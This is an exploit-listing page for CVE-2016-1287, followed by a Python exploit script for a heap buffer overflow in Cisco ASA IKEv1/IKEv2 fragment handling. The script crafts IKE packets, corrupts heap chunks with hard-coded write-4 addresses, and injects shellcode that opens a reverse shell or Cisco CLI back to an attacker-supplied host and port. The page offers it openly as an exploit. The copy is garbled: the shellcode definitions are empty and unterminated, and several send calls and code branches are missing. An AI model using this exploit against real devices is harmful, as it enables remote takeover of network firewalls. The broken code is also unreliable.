
Cisco ASA Software 8.x / 9.x - IKEv1 and IKEv2 Buffer Overflow

CVE Category Price Severity
CVE-2016-1287 CWE-119 $50,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2016-05-20
CVSS:4.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Cisco ASA Software 8.x / 9.x - IKEv1 and IKEv2 Buffer Overflow#!/usr/bin/env python2.7
import socket
import sys
import struct
import string
import random
import time
# Spawns a reverse cisco CLI
cliShellcode = (
# Spawns a reverse "/bin/sh"
shShellcode = (
# SA Session
class Session(object):
    def __init__(self, host_port, id = None):
        if id == None:
            id = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
        self._host, self._port = host_port
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._id = id
        self._mid = 1
        # Init session
        print("[+] Using session ID: " + self._id)
        # Check if we got something
        res = self.recv()
        cookie = res[8:16]
        print("[+] Cookie: " + cookie)
        self._cookie = cookie
        # Enforce value of 0x21
        if ord(res[16]) != 0x21:
            raise Exception("Invalid router response")
        print("[+] New SA successfuly created.")
    # UPD socket helpers
    def send(self, buf):
        self._sock.sendto(buf, (self._host, self._port))
    def recv(self, size = 4096):
        data, addr = self._sock.recvfrom(size)
        return data
    def make_SA(self):
        buf = ""
        buf += self._id                  # Initiator SPI 
        buf += "\x00"*8                  # Responder SPI
        buf += "\x21"                    # next payload (security association)
        buf += "\x20"                    # version
        buf += "\x22"                    # exchange type
        buf += "\x08"                    # flags
        buf += "\x00"*4                  # message ID
        buf += "$$$$"                    # length
        # stolen from pcap
        buf += "\x22\x00\x00\x6c\x00\x00\x00\x68\x01\x01\x00\x0b\x03\x00\x00\x0c\x01\x00\x00\x0c\x80\x0e\x01\x00\x03\x00\x00\x0c\x01\x00\x00\x0c\x80\x0e\x00\x80\x03\x00\x00\x08\x01\x00\x00\x03\x03\x00\x00\x08\x01\x00\x00\x02\x03\x00\x00\x08\x02\x00\x00\x02\x03\x00\x00\x08\x02\x00\x00\x01\x03\x00\x00\x08\x03\x00\x00\x02\x03\x00\x00\x08\x03\x00\x00\x01\x03\x00\x00\x08\x04\x00\x00\x02\x03\x00\x00\x08\x04\x00\x00\x05\x00\x00\x00\x08\x04\x00\x00\x0e"
        # this is the type of the next payload...
        buf += "\x28" # 0x28 = Nonce, 0x2b = vendor ID
        buf += "\x00\x00\x88\x00\x02\x00\x00\x50\xea\xf4\x54\x1c\x61\x24\x1b\x59\x3f\x48\xcb\x12\x8c\xf1\x7f\x5f\xd4\xd8\xe9\xe2\xfd\x3c\x66\x70\xef\x08\xf6\x56\xcd\x83\x16\x65\xc1\xdf\x1c\x2b\xb1\xc4\x92\xca\xcb\xd2\x68\x83\x8e\x2f\x12\x94\x12\x48\xec\x78\x4b\x5d\xf3\x57\x87\x36\x1b\xba\x5b\x34\x6e\xec\x7e\x39\xc1\xc2\x2d\xf9\x77\xcc\x19\x39\x25\x64\xeb\xb7\x85\x5b\x16\xfc\x2c\x58\x56\x11\xfe\x49\x71\x32\xe9\xe8\x2d\x27\xbe\x78\x71\x97\x7a\x74\x42\x30\x56\x62\xa2\x99\x9c\x56\x0f\xfe\xd0\xa2\xe6\x8f\x72\x5f\xc3\x87\x4c\x7c\x9b\xa9\x80\xf1\x97\x57\x92"
        # this is the Nonce payload
        buf += "\x2b"
        buf += "\x00\x00\x18\x97\x40\x6a\x31\x04\x4d\x3f\x7d\xea\x84\x80\xe9\xc8\x41\x5f\x84\x49\xd3\x8c\xee"
        # lets try a vendor id or three
        buf += "\x2b" # next payload, more vendor ID
        buf += "\x00" # critical bit
        vid = "CISCO-DELETE-REASON"
        buf += struct.pack(">H", len(vid)+4)
        buf += vid
        # another vendor id
        buf += "\x2b"   # next payload, more vendor ID
        buf += "\x00"   # critical bit
        vid = "CISCO(COPYRIGHT)&Copyright (c) 2009 Cisco Systems, Inc."
        buf += struct.pack(">H", len(vid)+4)
        buf += vid
        # another vendor id
        buf += "\x2b"   # next payload, more vid
        buf += "\x00"   # crit
        vid = "CISCO-GRE-MODE"
        buf += struct.pack(">H", len(vid)+4)
        buf += vid
        # last vendor id
        buf += "\x00"   # next payload
        buf += "\x00"
        vid = "\x40\x48\xb7\xd5\x6e\xbc\xe8\x85\x25\xe7\xde\x7f\x00\xd6\xc2\xd3"
        buf += struct.pack(">H", len(vid)+4)
        buf += vid
        return buf.replace("$$$$", struct.pack(">L", len(buf)))
    def make_cisco_fragment(self, flength, seqno, fragid, lastfrag, sploit):
        buf = ''
        buf += self._id               # Initiator SPI (random)
        buf += self._cookie                # Responder SPI
        buf += "\x84"                   # next payload
        buf += "\x20"                   # version
        buf += "\x25"                   # exchange type (2=identify protection)
        buf += "\x08"                   # flags
        buf += "\x00\x00\x00\x01"       # message ID
        buf += "ABCD"                   # length
        # PAYLOAD
        payload = ""
        payload += "\x00"               # next payload (none)
        payload += "\x00"               # critical bit
        payload += struct.pack(">H", flength)        #payload_len)  # length
        payload += struct.pack(">H", fragid)        # frag ID
        payload += struct.pack("B", seqno)         # frag sequence
        payload += struct.pack("B", lastfrag)
        payload += sploit
        buf += payload
        return buf.replace("ABCD", struct.pack(">L", len(buf)))
    def send_fragment(self, flength, seqno, fragid, lastfrag, sploit):
        buf = self.make_cisco_fragment(flength, seqno, fragid, lastfrag, sploit)
        # We're not supposed to receive anything if everything went
        # according to plan
    def make_cisco_option_list(self, opt_lst):
        buf = ''
        buf += self._id               # Initiator SPI (random)
        buf += self._cookie                # Responder SPI
        buf += "\x2f"                   # next payload
        buf += "\x20"                   # version
        buf += "\x25"                   # exchange type (2=identify protection)
        buf += "\x08"                   # flags
        buf += struct.pack(">I", 1)       # message ID
        buf += "ABCD"                   # length
        # PAYLOAD
        payload = ""
        payload += "\x00"               # next payload (none)
        payload += "\x00"               # critical bit
        payload += "EF"         #payload_len)  # length
        payload += "\x03"               # CFG_SET
        payload += "\x00\x00\x00"       # Reserved
        total = 0x8
        for size, n in opt_lst:
            option  = struct.pack(">H", 0x6000)  #id
            option += struct.pack(">H", size)    # data length
            option += "A" * (size)
            total += (size + 4) * n
            payload += option * n
        buf += payload
        packet = buf.replace("ABCD", struct.pack(">L", len(buf))).replace("EF", struct.pack(">H", total))
        return packet
class Exploit(object):
    def __init__(self, host, revHost, revPort = 4444):
        self._host = host
        self._port = 500
        self._revHost = revHost
        self._revPort = revPort
        self._sessions = []
    # Create a new SA session
    def create_SA(self, id = None):
        # Create a new socket for session
        sess = Session((self._host, self._port), id)
        # Append to session list
        return sess
    # Interact with reverse shell
    def interact(self):
        from telnetlib import Telnet
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((self._revHost, self._revPort))
        cli = s.accept()[0]
        print("[+] Got connect-back")
        t = Telnet()
        t.sock = cli
    def buildPayload(self, cli = False):
        if cli == False:
            buf = bytearray(shShellcode)
            # Adjust IP and port
            buf[0x1ad:0x1b1] = socket.inet_aton(self._revHost)
            buf[0x1b5:0x1b7] = struct.pack(">H", self._revPort)
            Shellcode = bytes(buf)
            Shellcode = cliShellcode.replace("@IP@", self._revHost).replace("@PORT@", str(self._revPort))
        return Shellcode
if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("[+] Usage: {0:s} <cisco IP> <attacker IP>[:port]".format(sys.argv[0]))
    #TODO: Check host
    host = sys.argv[1]
    revHost = sys.argv[2]
    # Parse revHost
    port = 4444
    if revHost.rfind(":") != -1:
        revHost, port = revHost.split(":")
        port = int(port)
    exploit = Exploit(host, revHost, port)
    sess1 = exploit.create_SA()
    sess2 = exploit.create_SA()
    n = 0xd6
    sess2.send_fragment(0x8 + n + 3, 1, 5, 0, "A" * (n + 3))
    # Send packets which will trigger the vulnerability
    # Weird packet to get a size of 0x1
    sess2.send_fragment(8 + -7, 0, 6, 1, "A" * (256 - 7))
    # This fragment will be the one being copied
    # during the memory corruption
    buf = "A" * (n - 0xd + 0x3)
    buf += struct.pack("<I", 0xef000000)
    buf += struct.pack("<I", 0x00a11ccd) # chunk magics
    buf += struct.pack("<I", 0xe100d4d0)
    buf += struct.pack("B", 0x61)       # set size from 0x31 to 0x61 in order to encompass the
                                        # adjacent chunk on free
    sess2.send_fragment(8 + n + 3, 1, 6, 0, buf)
    sess1.send_fragment(0x8 + 0xf8, 1, 0xeb, 0, "A" * 0xf8)
    pkt = sess1.make_cisco_option_list((
        (0xd0, 0x30), 
    # Defragment heap
    # Prepare a fake chunk
    buf  = ""
    buf += struct.pack("<I", 0x60)
    buf += struct.pack("<I", 0x102)
    buf += struct.pack("<I", 0xa11c0123)
    buf += struct.pack("<I", 0xe0)
    buf += "A" * 0xe8
    # And allocate it right after a 0x100 bytes hole
    sess1.send_fragment(0x8 + 0xf8, 2, 0xeb, 0, buf)
    # Trigger the overflow
    sess2.send_fragment(8 + -7, 3, 6, 1, "A" * (256 - 7))
    # Retrieve of fake freed block
    #buf = "\xcc" * (0xd0 - len(buf))
    buf = "\x00" * 0xd0
    buf += struct.pack("<I", 0xe100d4d0)
    buf += struct.pack("<I", 0x31)
    # this is a special writable address in the process
    # it translate into the following executable code:
    # nop / jmp [ecx]
    # since ecx happens to hold a pointer to a controlled buffer
    # the execution flow will be redirected to attacker controlled data
    what = 0xc821ff90
    # Just some writable address in the process which doesn't seem to be used
    where = 0xc8002000 - 0x8
    buf += struct.pack("<I", what)
    buf += struct.pack("<I", where)
    buf += struct.pack("<I", 0xf3ee0123)
    buf += struct.pack("<I", 0x0) * 5
    buf += struct.pack("<I", 0x5ee33210)
    buf += struct.pack("<I", 0xf3eecdef)
    buf += struct.pack("<I", 0x30)
    buf += struct.pack("<I", 0x132)
    buf += struct.pack("<I", 0xa11c0123)
    buf += struct.pack("<I", 0x100)
    buf += struct.pack("<I", 0x0) * 2
    # Second write-4 pointers
    # This is the address of the pointer to the "list_add" function
    # which will give us control of execution flow
    where = 0x0A99B7A4 - 0x10
    # This is the address where the opcode sequence "nop / jmp [ecx]" is located
    what = 0xc8002000
    buf += struct.pack("<I", what)
    buf += struct.pack("<I", where)
    buf += "\x00" * (0x128 - len(buf))
    # Try to chain a config list and a fragment packet
    packet = bytearray()
    packet += sess1._id               # Initiator SPI (random)
    packet += sess1._cookie                # Responder SPI
    packet += "\x2f"                   # next payload option list
    packet += "\x20"                   # version
    packet += "\x25"                   # exchange type (2=identify protection)
    packet += "\x08"                   # flags
    packet += struct.pack(">I", 1)       # message ID
    packet += "XXXX"                   # total length including header
    payload = bytearray()
    payload += "\x00"               # next payload (frag)
    payload += "\x00"               # critical bit
    payload += "\x00\x00"       # payload length
    payload += "\x03"               # CFG_SET
    payload += "\x00\x00\x00"       # Reserved
    size = 0x130
    option  = struct.pack(">H", 0x8400)  #id
    option += struct.pack(">H", size)    # data length
    option += "\x90" * 0x8 + buf
    payload += option * 0x10
    # Update payload length
    payload[2:4] = struct.pack(">H", len(payload))
    packet += payload
    # Update payload length
    packet[0x18:0x1C] = struct.pack(">I", len(packet))
    packet = bytes(packet)
    # Reallocate the fake freed 0x130 bytes chunk with controlled data
    # this way we can perform a write-4 memory corruption when freeing 
    # the subsequent memory
    packet = bytearray()
    packet += sess1._id               # Initiator SPI (random)
    packet += sess1._cookie                # Responder SPI
    packet += "\x84"                   # next payload option list
    packet += "\x20"                   # version
    packet += "\x25"                   # exchange type (2=identify protection)
    packet += "\x08"                   # flags
    packet += struct.pack(">I", 1)       # message ID
    packet += "XXXX"                   # total length including header
    buf = exploit.buildPayload(cli = True) 
    flength = len(buf) + 0x8
    fragid = 0xeb
    seqno = 0x5
    lastfrag = 0
    payload = bytearray() 
    # Jump over garbage directly into shellcode (interpreted as jmp +0x6)
    payload += "\xeb"               # next payload (none)
    payload += "\x06"               # critical bit
    payload += struct.pack(">H", flength)        #payload_len)  # length
    payload += struct.pack(">H", fragid)        # frag ID
    payload += struct.pack("B", seqno)         # frag sequence
    payload += struct.pack("B", lastfrag)
    payload += buf
    packet += payload
    # Update payload length
    packet[0x18:0x1C] = struct.pack(">I", len(packet))
    packet = bytes(packet)
    # Trigger the 2 write-4 and get code execution
    # Hopefully we'll get something interesting

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